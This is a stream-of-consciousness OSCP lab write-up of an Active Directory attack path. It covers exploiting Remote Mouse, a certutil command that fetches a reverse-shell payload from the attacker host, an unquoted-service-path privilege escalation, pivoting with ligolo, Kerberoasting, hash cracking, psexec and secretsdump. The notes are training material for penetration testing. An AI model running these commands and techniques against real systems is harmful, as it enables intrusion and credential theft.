# DerronC: Active Directory Attack Path 1
Willkommen! This is most certainly not any sort of documentation that follows the rules of submission for the OSCP.
Professionalism? None. Frustration? Yes. Hotel? Trivago.
However, this does track the steps (and potentially emotions) of someone attempting an AD box for the OSCP. It's really more stream-of-consciousness note-taking as I try and learn - with some attempts at organisation where I might add things after the fact. This introduction section being an example of that.
*(Attempts at organising will eventually break down sometime later - as note-taking is linear, but some processes in Pen Testing can run in parallel)*
The steps mostly(99.99%) follow DerronC's genuinely wonderful [guide](https://youtu.be/gY_9Dncjw-s)
## Pre-attack steps
We want to be as organised as possible (I hear it's really useful and makes life easier, but you do you if you don't want to).
Make a directory where everything else goes. Inside that directory I am going to make 4 directories
- enu - enumeration
- files - any files we find
- exploits - for any exploits we might need to download
- loot - for the flags we need to find

*Note: DerronC organises things according to the machines available - so he has ms01, ms02, and dc01 folders, and then the four folders above - but I want to assume that I have no information on how many machines might be in the lab when I begin*
## Reconnaissance
We ran `sudo netdiscover -r 172.16.66.0/24` to see if any hosts were up - but this yielded no results

However, `sudo nmap -sn 172.16.66.0/24` yielded 3 hosts

- 172.16.66.1 -> we know this to be the default gateway for this network
- 172.16.66.105 -> This is our attacking machine
- 172.16.66.201 -> HMMMM... We WoNdEr WhAt ThIs CoUlD bE?
## 172.16.66.201
### Initial Scan
Let's enumerate this


We see a whole host of ports there.
One of the first things we might notice is that there is probably a web server running, since ports 80 and 443 are open. So we can run gobuster for some directory brute-forcing.
### Webserver
#### Directory Bruteforcing
Naturally, we first have to install gobuster because I forgot to - classic me!


Using gobuster in conjunction with its common wordlist

Tee will also save the output to the file - however, we like the pretty colours, so let's do that again without tee (gobuster's own `-o` flag would also write the results to a file while keeping the coloured terminal output).

Results:

At first we won't be as interested in the 403s (Forbidden), but we note the 301s and 200s.
- 200s - it's a favicon! yay...
- 301s - we see a dashboard - and also an uploads directory. This could hold something interesting for us
- We might also be able to do some exploitation by uploading something there?
We can click through the links
- Dashboard will bring us to the dashboard we see below
- imgs will just show us two images used on the welcome page
- Let's see where uploads leads to

We discover an interesting file

Let's save it into our files directory

We use exiftool to get more information on the file


- The file name is some string
- It is a 32-bit Windows executable
- PE32 = Portable Executable
- It is on the Windows GUI subsystem
- We see it is an installer
- We also have the company name, product, and version!
#### Manual Enumeration
We access the webserver

We can tell it's XAMPP for Windows, so this is a Windows server.
We can't access the phpMyAdmin - but the error message does tell us what version of Apache this is

We can also access phpInfo

In phpInfo we can also find interesting things, such as the PHP Variables section

We see that the document root is in C:/xampp/htdocs

This provides us a better understanding of the file structure as it's not in a default Program Files folder.
### Service Fingerprinting

We can see a bunch of ports there so let's run an nmap scan with fingerprinting scripts on just those ports

We're running -sCV:
-sC: Performs a script scan using the default set of scripts. It is equivalent to --script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.
-sV (Version detection): Enables version detection. Alternatively, you can use -A, which enables version detection among other things.
Results

- We can see that 80 and 443 are probably running the same service just on different ports

- We still don't know what's running on ports 1978 to 1980
- 1978 did return some fingerprint strings
- And for every fingerprint string we sent, it returned the same response: SIN 15win nop nop 300
- 1979 and 1980 returned nothing
### Files Enumeration
We can use searchsploit to find information about the executable installer we found

It looks like we have local priv esc and also RCE
Let's have a look at the RCE exploit

- We see that Remote Mouse accepts unauthenticated mouse and keyboard input from any machine that connects, so anything it can type can be executed on the host
Looking at the script

We see a few familiar things
- It attempts to connect to port 1978 (which we found was open earlier)
- If it receives "SIN 15win nop nop 300" then it returns True - this is the exact string we found earlier as well

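The ping check above, as an added example that is not part of the original notes or of the searchsploit exploit: a small Python checker that connects to TCP/1978, sends a probe and compares the reply with the banner seen in both the nmap fingerprint and the exploit. The probe bytes are an assumption (the nmap run showed that every fingerprint string got the same reply, so a bare CRLF is used), and the fake service is a constructed stand-in so the check can be exercised offline before pointing it at the lab.

```python
import socket
import threading

# Banner the Remote Mouse service on TCP/1978 returns to any probe, as seen
# in the nmap fingerprint output and hard-coded in the exploit's ping check.
REMOTE_MOUSE_BANNER = b"SIN 15win nop nop 300"


def check_remote_mouse(host, port=1978, probe=b"\r\n", timeout=3.0):
    """Return True if host:port answers a probe with the Remote Mouse banner.

    The probe bytes are an assumption: any input elicited the banner during
    fingerprinting, so a bare CRLF is enough. A refused connection, a
    timeout, or a silent close all count as "not Remote Mouse".
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(probe)
            reply = sock.recv(256)
    except OSError:
        return False
    return reply.startswith(REMOTE_MOUSE_BANNER)


def start_fake_service(banner, host="127.0.0.1"):
    """Start a one-shot TCP server that replies with `banner` (nothing if None).

    Constructed stand-in for the real service so the check can be run
    offline; returns the ephemeral port it is listening on.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)

    def serve_once():
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(2.0)
            try:
                conn.recv(256)  # swallow the probe
            except OSError:
                pass
            if banner is not None:
                conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve_once, daemon=True).start()
    return srv.getsockname()[1]


def sweep(hosts, port=1978):
    """Return the subset of `hosts` that look like Remote Mouse on `port`."""
    return [h for h in hosts if check_remote_mouse(h, port)]


if __name__ == "__main__":
    port = start_fake_service(REMOTE_MOUSE_BANNER + b"\n")
    print("fake Remote Mouse on 127.0.0.1:%d ->" % port,
          check_remote_mouse("127.0.0.1", port))
```

Against the lab, `sweep(["172.16.66.201"])` is the equivalent of the exploit's Ping function; the silent and wrong-banner cases are what you get from ports 1979 and 1980, which returned nothing during fingerprinting.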
We also see the index of keycodes

And the main function

In main we see that if the Ping function from above evaluates to true then the PopCalc function triggers. And PopCalc:
- moves the mouse to the bottom left of the screen
- Initiates a left click (on a windows machine this is probably the start menu)
- Sends the string calc.exe
- Hits enter
- and then tells us that calc.exe has run on the target. That won't help us, so we need to adjust the script to make it do what we want. We probably need to generate a shell for that
### Exploitation
We need a payload that gives us a shell. We can use CertUtil on the target to download the payload from our Kali box onto WC1, then run it to get a reverse shell.
Let's first download the exploit since it looks like a match

#### Payload

- We are using the 64-bit Windows reverse TCP shell payload
- lhost is our machine's IP
- For lport: we know the host firewall is on, so an arbitrary port has a higher chance of being blocked outbound
- Outbound connections to a well-known port like 443 will probably still be allowed
- We need to select a format; an executable will do
- And also the output file
Once ready we will serve the payload executable on a webserver using python

To get the target machine to download the payload we are going to modify the exploit


Change to:

- We are using the command "certutil.exe -urlcache -f http://172.16.66.105/winrev443.exe \users\public\winrev443.exe"
- Command breakdown:
- certutil.exe: the Windows certificate utility (certificates, certificate revocation lists and certificate stores). It is also a well-known living-off-the-land download tool because it can fetch a URL straight to a file.
- -urlcache: displays or deletes URL cache entries; given a URL and an output file it fetches the URL and writes the content to that file, which is the behaviour we are abusing here.
- -f: forces CertUtil to overwrite any existing file at the destination path.
- DerronC notes that most people like to save files into \windows\temp; he prefers \users\public as it is also world-writable.
We run the command and we will know it was successful when we see the response on our http server

So now we know the payload has been downloaded to the machine. To trigger the payload, we will set up a listener and then adjust the script of the exploit again
1. Adjust script to access and trigger the payload

2. Start listener

3. Execute - and we're in!

4. Let's have a look at what privileges we have

- We notice that lucy has SeShutdownPrivilege listed as Disabled. In `whoami /priv` output, "Disabled" only means the privilege is not currently enabled in the token, not that lucy lacks it; a process can enable it and reboot the box. The wording is ENTIRELY counterintuitive (a lot like how we have to set DisableRealtimeMonitoring to true - I mean, come on!)
- This actually provides a better explanation: https://juggernaut-sec.com/weak-service-file-permissions/
- But essentially, if we want to exploit a task or service that runs at startup, we can trigger it by restarting the machine
5. We also want to see who the local users are and who is in the local Administrators group

- We also notice Domain Admins listed in the local Administrators group, which confirms that this machine is joined to a domain.
6. Our next steps will be to download winPEAS, load it onto the victim machine and run it
- We will still have to do some manual enumeration
- But, we can get the majority of our info from winPEAS, which is a great tool and also because time is not on our side
7. Before we go ahead - let's look for any loot we might find as lucy
After some looking around - we find it on the desktop

We can save it (we should - unless you fancy memorizing a few 32 character strings)

#### winPEAS
Download


Stage

Download on WC1

Execute


We want to look at anything highlighted in Red (or in my case pink because of my terminal colour settings - but [pink is not real](https://www.youtube.com/watch?v=S9dqJRyk0YM)).
Basic System Information

Windows Vulns (by Watson)

- In this case, these are handy to take note of.
- If everything else we have tried and enumerated leads nowhere, kernel exploits are a good fallback (with the usual risk of crashing the box)
System Environment Variables

- Worth looking at, but nothing stands out in this one
Cached Logons - we see that there are some cached logons

PWSH History

- Nothing here for this one
Enumerating NTLM Settings

- The NTLM settings (LmCompatibilityLevel) show NTLMv2, which tells us what kind of authentication hashes to expect on the wire: Net-NTLMv2 challenge/response hashes
- Those can only be cracked offline (or relayed), not passed; pass-the-hash needs the raw NT hash from the SAM or NTDS
Users

- No local administrator accounts are available
- We will probably need domain admin accounts to escalate privileges
Ever Logged Users

- We see that a domain user has logged on (and also an administrator in this case)
- This is also confirmed in the present home folders

Autologon Credentials

Services Information - can find useful things here

- If we look at wisebootassistant, we see that its binary path contains spaces and is unquoted, and that we have write permission on a directory along that path.
- We will create an executable named to match one of the truncated paths Windows tries before the real binary; that is how an unquoted service path gets hijacked
#### Priv Esc using Unquoted Service Path
Since we already have a payload on the machine, we are going to copy it into the folder that Wise Boot 365 lives in and name it Wise, matching the truncated path, so that it is executed as the service when we restart the box.


If we inspect the configuration using `sc qc`, we can see that wise runs as LocalSystem, which is what we want

So let's set it to reboot in 1 second and quickly start a listener on 443. As quickly as I set up the listener, the bloody app still took quite a bit of time to start up. But we did it; in the end we got a shell as SYSTEM. (The safer ordering is to start the listener first and then issue the reboot, so the callback cannot arrive before anything is listening.)

We can then find the administrator's loot

and save that as well

#### Extra proofs

#### Make sure we are keeping some sweet notes

Honestly, I would be keeping all the notes in CherryTree, with subnodes for each machine where I would store the results of scans and loot etc. etc., but I'm currently also doing all that here in this document (which I'm fairly certain is also documenting my further descent into insanity).
Something like this:

#### Some additional stuff
One of the things I tried was using the command DerronC used to find the txt files, but with a wildcard character

And this gave me a lot of results - but at the bottom of the results I found these - which are the initial local user proof and also wyldstyle's powershell history

### Create pivot point
#### Initial Manual enumeration
We need to further enumerate WC1 to find breadcrumbs for pivoting into the AD
We saw wyldstyle's home directory available earlier so we are going to look there.

We run some searches to find log files and txt files

We see that wyldstyle has a PowerShell console history (PSReadLine keeps it in `%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`), which is of interest as it might hold some clues for us

- Sure enough, we find that wyldstyle has attempted to connect to some machine called WC03 and has left his username and password in the console history
#### [ligolo-NG](https://github.com/nicocha30/ligolo-ng)
##### Download
We need to download 2 things:
1. An agent, which we will run on the Windows target (WC1)

2. Proxy which we will be running on our Kali VM

Move files to folder and extract
- Agent

- Proxy

##### Setup
Move the proxy to /usr/bin and check that we can access via command line

Follow setup guide:
Create tun interface on proxy server



Check status

Serving up agent to download from webserver


##### Use
Start proxy server

It starts running and here, listening on port 11602

Connect from agent

Connected

We have a session

ligolo ifconfig

To create a tunnel to pivot we simply type in start

Now we have the agent and the proxy server running
We need to tell Kali to route the target network through the tunnel interface

## Scanning the 192.168.99.0/24 network
When we try to scan the network through the tunnel, netdiscover gives us nothing (it relies on ARP, which does not cross the layer 3 tunnel) and nmap -sn gives us... everything, or at least it tells us that all the hosts are up, which we can safely assume is not true.

Nmap giving real golden retriever energy by wagging its tail at every host as if they were ALL up

Down boy!
Again, I didn't want to assume that I knew what the IPs and machines were so, since I knew how to get an admin shell on the machine, I decided to use `arp -a` on WC1 to read its ARP cache (the neighbours it has recently talked to). I do not know if this is the right way to do this, but hey, it worked a little

We can see in the 192.168.99.0/24 network we have a .1, .2, and .212 machines.
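The `arp -a` approach above gives a noisy table that includes broadcast and multicast entries. As an added example (not part of the original notes), here is a Python parser for Windows `arp -a` output that keeps only the unicast neighbours inside the target subnet and adds a vendor hint from the MAC prefix. The sample output is constructed: the three lab addresses are reproduced, but the interface address 192.168.99.201 and all MAC addresses are assumptions. An ARP cache only lists hosts the pivot has recently exchanged traffic with, so treat the result as a seed list and follow up with a TCP scan (`-Pn`) through the tunnel rather than as a complete sweep.

```python
import ipaddress
import re

# Constructed `arp -a` output as printed on a Windows host. The interface
# address and MAC addresses are assumptions; the .1/.2/.212 hosts are the
# ones found in the lab.
SAMPLE_ARP_A = """
Interface: 192.168.99.201 --- 0xb
  Internet Address      Physical Address      Type
  192.168.99.1          00-50-56-c0-00-08     dynamic
  192.168.99.2          00-0c-29-3a-1b-2c     dynamic
  192.168.99.212        00-0c-29-5d-6e-7f     dynamic
  192.168.99.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
"""

# Well-known VMware OUIs: a hint that a neighbour is a lab VM (prefix lookup
# only, not a guarantee of anything).
VMWARE_OUIS = {"00:50:56", "00:0c:29"}

IFACE_RE = re.compile(r"^Interface:\s+(\S+)")
ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"       # IP address
    r"([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+"  # MAC in Windows dash form
    r"(dynamic|static)\s*$",
    re.IGNORECASE,
)


def parse_arp_a(text):
    """Return one dict per neighbour entry: interface, ip, mac, type."""
    iface = None
    entries = []
    for line in text.splitlines():
        m = IFACE_RE.match(line.strip())
        if m:
            iface = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append({
                "iface": iface,
                "ip": m.group(1),
                "mac": m.group(2).lower().replace("-", ":"),
                "type": m.group(3).lower(),
            })
    return entries


def live_hosts(text, network):
    """Unicast neighbours inside `network`, minus broadcast/multicast noise."""
    net = ipaddress.ip_network(network)
    hosts = []
    for e in parse_arp_a(text):
        ip = ipaddress.ip_address(e["ip"])
        if ip not in net or ip.is_multicast or ip == net.broadcast_address:
            continue
        if e["mac"] == "ff:ff:ff:ff:ff:ff":
            continue
        hosts.append(e["ip"])
    return hosts


def vendor_hint(mac):
    """Crude OUI lookup for the prefixes this lab is likely to use."""
    return "VMware" if mac[:8].lower() in VMWARE_OUIS else "unknown"


if __name__ == "__main__":
    for e in parse_arp_a(SAMPLE_ARP_A):
        if e["ip"] in live_hosts(SAMPLE_ARP_A, "192.168.99.0/24"):
            print(e["ip"], e["mac"], vendor_hint(e["mac"]))
```

On the real pivot you would paste the output of `arp -a` (or `Get-NetNeighbor` in PowerShell, which has a different layout and would need its own regex) into `live_hosts` and feed the result to nmap through the ligolo route.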
Let's start by scanning the .2 machine



One of the things to notice is definitely the NetBIOS name of DC01.
We can run the same command for .212 simultaneously

Another thing we can do is have a look at the shares available

Well, well, well, what do we have here? backups? That's not a standard share AT ALL. Someone's being a careless little boy.
We have a look

And similarly for .212 - which we checked since port 445 did turn up as open on our scan

And we see a non-default share called setup - let's try and access that

Interesting. This isn't entirely helpful in itself, but it does confirm we have SMB access, which is a potential vector for psexec once we get admin credentials; we may also get different listings with different credentials.
## Kerberoasting and AS-REP Roasting
### Discovery

Ooooh. Look at that: we found a service account with a service principal name attached to it. What does this mean? I don't know yet because I have the video guide paused so I can type this.
Ah, it means any domain user can request a TGS ticket for that SPN; the ticket is encrypted with a key derived from the service account's password, so we can take it offline and crack it (Kerberoasting).
Copy and save

Hashid does not recognise this

Let's see if we have any AS-REP roastable users (accounts with Kerberos pre-authentication disabled)
well, well, well

also "unknown" - hashid really not living up to its name

Yay, time to pass the hashes!
What's that you say? I can't pass these because they aren't NT hashes? Right: Kerberoast and AS-REP roast output is Kerberos ticket material (TGS-REP and AS-REP), not an NT hash, so like the Net-NTLMv2 we noted in the winPEAS output it can only be cracked offline, not passed. Damn, I really should have remembered that little tidbit from when we were going over the results of winPEAS. 😉
However, we can try to crack them
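Since hashid did not recognise either roast output, here is an added Python triage helper (not part of the original notes or of any tool it mentions) that identifies the formats that turn up in this attack path by their structure, maps each to its hashcat mode and says whether it can be passed or only cracked. It also covers the Net-NTLMv2 format discussed under the winPEAS NTLM settings and the secretsdump line format seen later. The sample hashes are constructed: the user names are the lab's, the realm CORP.LOCAL is an assumption, and the hex digits are dummies, so nothing here will crack.

```python
import re

# Constructed sample hashes. Realm and hex content are dummies; only the
# shape of each line matters for identification.
KERBEROAST = ("$krb5tgs$23$*svc_iis$CORP.LOCAL$HTTP/wc1.corp.local*$"
              + "a" * 32 + "$" + "b" * 64)
ASREP = "$krb5asrep$23$wyldstyle@CORP.LOCAL:" + "c" * 32 + "$" + "d" * 64
NET_NTLMV2 = ("lucy::WC1:1122334455667788:" + "e" * 32
              + ":0101000000000000" + "f" * 48)
SECRETSDUMP_LINE = ("corp.local\\lord_business:1105:"
                    "aad3b435b51404eeaad3b435b51404ee:" + "0" * 32 + ":::")

NET_NTLMV2_RE = re.compile(
    r"[^:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+")
SECRETSDUMP_RE = re.compile(
    r"([^:]+):\d+:[0-9a-fA-F]{32}:([0-9a-fA-F]{32}):::")
NT_ONLY_RE = re.compile(r"[0-9a-fA-F]{32}")


def classify(h):
    """Identify a credential artefact and say what can be done with it.

    `passable` is True only for a raw NT hash (pass-the-hash works);
    Kerberos ticket material and challenge/response hashes must be cracked.
    """
    h = h.strip()
    kerb = {
        "$krb5tgs$23$": ("Kerberos TGS-REP etype 23 (RC4), Kerberoast", 13100),
        "$krb5tgs$17$": ("Kerberos TGS-REP etype 17 (AES128), Kerberoast", 19600),
        "$krb5tgs$18$": ("Kerberos TGS-REP etype 18 (AES256), Kerberoast", 19700),
        "$krb5asrep$23$": ("Kerberos AS-REP etype 23 (RC4), AS-REP roast", 18200),
    }
    for prefix, (kind, mode) in kerb.items():
        if h.startswith(prefix):
            return {"kind": kind, "hashcat_mode": mode, "passable": False}
    if NET_NTLMV2_RE.fullmatch(h):
        return {"kind": "Net-NTLMv2 challenge/response", "hashcat_mode": 5600,
                "passable": False}
    m = SECRETSDUMP_RE.fullmatch(h)
    if m:
        return {"kind": "secretsdump LM:NT line", "hashcat_mode": 1000,
                "passable": True, "user": m.group(1), "nt_hash": m.group(2)}
    if NT_ONLY_RE.fullmatch(h):
        # 32 hex chars is ambiguous (NT, LM or plain MD5); NT is the usual
        # case in an AD engagement, so flag it as passable with that caveat.
        return {"kind": "32-hex digest, probably NT hash", "hashcat_mode": 1000,
                "passable": True, "nt_hash": h.lower()}
    return {"kind": "unknown", "hashcat_mode": None, "passable": False}


def hashcat_command(h, hashfile="hashes.txt",
                    wordlist="/usr/share/wordlists/rockyou.txt", rules=None):
    """Build the hashcat invocation for a recognised hash, or None."""
    info = classify(h)
    if info["hashcat_mode"] is None:
        return None
    cmd = ["hashcat", "-m", str(info["hashcat_mode"]), hashfile, wordlist]
    if rules:
        cmd += ["-r", rules]
    return " ".join(cmd)


if __name__ == "__main__":
    for sample in (KERBEROAST, ASREP, NET_NTLMV2, SECRETSDUMP_LINE):
        info = classify(sample)
        print(f"{info['kind']:50} pass-the-hash: {info['passable']}")
        print("  ", hashcat_command(sample))
```

Running it on the real svc_iis output would have pointed straight at `-m 13100`, and adding a rule file is the `-r` argument, which is exactly the step tried below with the ruleset.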


Oh no that didn't work - let's add on a ruleset

And it turns out that didn't lead anywhere - but I guess process of elimination amiright? (I am - but only because people WAY smarter than me are right)

Let's try hashcatting the svc_iis hash instead

Hello there!

### CME
Make these two files



Okay, so we can log on with SMB but still have no admin access
### Back to SMB
With svc_iis we get some sweet access

Let's get that file

Extract it - oh! We need a password

Let's use zip2john

Now John that bad boy

[BOOM! Headshot!](https://youtu.be/olm7xC-gBMY?si=SOWcmCHJbGl-dJ6b&t=10)
And here we go

Adjust files





WELL WELL WELL
Looks like we have an admin account for WC2 - we don't even need to priv esc
Let's use psexec


Do we find any loooooooot?





### More digging around


Looks like our boy lord_business is all up in the domain's business with excessive admin assignments.
Since he's a domain admin, we definitely want to see if we can get more from lord_business - using secretsdump

Let's fking GOOOOOOOOOOOOOOO

We also thought we had found the NT hash for lord_business, which we could pass-the-hash with; it turned out not to be an NT hash after all, but in this case we don't even need it, since we have that sweet password.

THREE HOLES IN THE GROUND (well, well, well)


Nothing on his desktop

Maybe somewhere here?

Hello there!

Look at all this proof of pwnage - yum yum

Using evil-winrm we can also download proof.txt


## Attempt to be organised in a way more in line with writing the OSCP report
